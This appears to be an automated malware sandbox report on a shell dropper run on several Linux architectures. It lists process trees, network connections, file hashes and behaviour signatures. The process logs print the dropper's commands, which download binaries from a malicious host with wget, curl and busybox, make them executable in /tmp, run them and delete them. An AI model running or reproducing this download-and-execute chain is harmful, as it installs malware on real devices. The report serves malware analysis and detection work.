[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/chmod
[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/rm
[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/chmod
[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/rm
[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/chmod
[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/rm
[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/chmod
[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/rm
[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/chmod
[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/rm
[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/chmod
[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/rm
[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/chmod
[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/rm
[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/chmod
[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/rm
[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/chmod
[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/rm
[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:03
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh
[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 84.17.50.8:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:03
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
21s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh
[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:03
Platform
debian9-mipsbe-20240418-en
Max time kernel
81s
Max time network
83s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | N/A |
| N/A | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | N/A |
| N/A | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | N/A |
| N/A | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | N/A |
| N/A | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | N/A |
| N/A | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | N/A |
| N/A | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | N/A |
| N/A | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | N/A |
| N/A | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | N/A |
| N/A | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | N/A |
| N/A | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | N/A |
| N/A | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | N/A |
| N/A | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | N/A |
| N/A | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | N/A |
| N/A | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | N/A |
| N/A | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | N/A |
| N/A | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | N/A |
| N/A | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | N/A |
| N/A | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | N/A |
| N/A | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | N/A |
| N/A | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | N/A |
| N/A | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | N/A |
| N/A | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | N/A |
| N/A | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | N/A |
| N/A | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | N/A |
| N/A | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | N/A |
| N/A | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | N/A |
| N/A | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
